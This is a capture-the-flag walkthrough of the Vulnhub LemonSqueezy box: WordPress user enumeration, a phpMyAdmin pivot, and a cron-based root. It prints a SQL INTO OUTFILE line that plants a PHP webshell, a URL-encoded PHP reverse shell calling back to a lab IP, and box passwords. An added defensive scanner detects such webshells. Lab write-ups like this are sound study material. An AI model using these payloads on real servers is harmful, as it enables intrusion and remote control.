Vulnhub - LemonSqueezy: 1
Introduction
This is a beginner boot2root in a similar style to ones I personally enjoy like Mr Robot, Lazysysadmin and MERCY.
This is a VMware machine. DHCP is enabled, add lemonsqueezy to your hosts. It’s easypeasy!
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s LEMONSQUEEZY: 1 from vulnhub.
Ports
We’ve got one port only; HTTP on 80.
HTTP
So with a quick gobuster fishing expedition we find a couple of interesting things - in particular, WordPress and phpMyAdmin.
Running wpscan gets us two users, lemon and orange. A password attack gets an easy win:
Using these credentials we can log in to WordPress, but orange is not an admin. However, we can find a post called Keep this safe! which contains a password: n0t1n@w0rdl1st!.
With this, we can log in to phpMyAdmin as orange. Once there, we can grab the hash for lemon and try to crack it with Hashcat, but it doesn’t crack easily. So instead we can change it to the same hash as used by orange, because we know orange’s password is ginger. Once we’ve done that we can log in to WordPress as lemon.
Wordpress
Normally we could run some PHP code in WordPress in a few different ways. We could edit an existing plugin, we could upload a new (malicious) plugin, or we could edit the PHP code of an existing theme. Unfortunately, none of these work because the temporary upload folder hasn’t been set in wp-config.php, and we can’t change it. What’s more, the existing plugin and theme files are all set as non-editable. Again, something we can’t change from the dashboard. Now what?
phpMyAdmin
Back in phpMyAdmin, we can create a new table and then run this SQL on it:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/wp-content/uploads/test.php"
Once we’ve done that, we can visit http://lemonsqueezy/wordpress/wp-content/uploads/test.php and run commands - finally, RCE! Note that I did also set the uploads directory in wp-options in phpMyAdmin but I don’t know if this was actually necessary or not.
This one gets me a shell:
http://lemonsqueezy/wordpress/wp-content/uploads/test.php?cmd=php+-r+%27$sock%3dfsockopen(%22192.168.1.77%22,1234)%3bexec(%22/bin/sh+-i+%3C%263+%3E%263+2%3E%263%22)%3b%27
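From the defensive side, the pivot above leaves a PHP file sitting in wp-content/uploads, a directory that should only ever hold media. The following added example (my own code, not from the walkthrough) walks an uploads tree and flags any PHP file plus any file, whatever its extension, that contains a command-execution sink fed by a request superglobal; the sample files are constructed inline.

```python
"""Scan a WordPress uploads tree for PHP files (which should never be there)
and for files containing command-execution sinks fed from request input."""
import os
import re
import tempfile

# PHP functions that turn a string into a shell or PHP command.
SINKS = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.I)
# Superglobals carrying attacker-controlled request data.
SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def scan_uploads(root):
    """Return a list of (path, reason) findings for the uploads tree."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower().endswith(PHP_EXT):
                findings.append((path, "php file in uploads"))
            try:
                with open(path, "r", errors="replace") as fh:
                    body = fh.read(65536)  # head of file is enough for a one-liner
            except OSError:
                continue
            # Flag only when both a sink and a request source are present,
            # which catches the <?php system($_GET['cmd']); ?> pattern.
            if SINKS.search(body) and SOURCES.search(body):
                findings.append((path, "request-controlled command sink"))
    return findings


def demo():
    """Constructed sample tree: one benign image and one one-liner webshell."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0 constructed, not a real jpeg")
    with open(os.path.join(root, "test.php"), "w") as fh:
        fh.write('<?php system($_GET["cmd"]); ?>')
    return scan_uploads(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{reason}: {path}")
```

On a real install, pair this with MySQL's secure_file_priv setting (which restricts where INTO OUTFILE may write) and a web-server rule that refuses to execute PHP under the uploads directory.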
On the box
Running linpeas.sh shows a cronjob of interest:
So this sure looks like a candidate for the logrotten exploit, right? But first let’s just check the contents:
Ah! Shenanigans! Well it’s fine, because we can write to the file. Let’s replace the contents:
And now we wait ….
Root
I enjoyed this one and learned some little tricks. Nice one.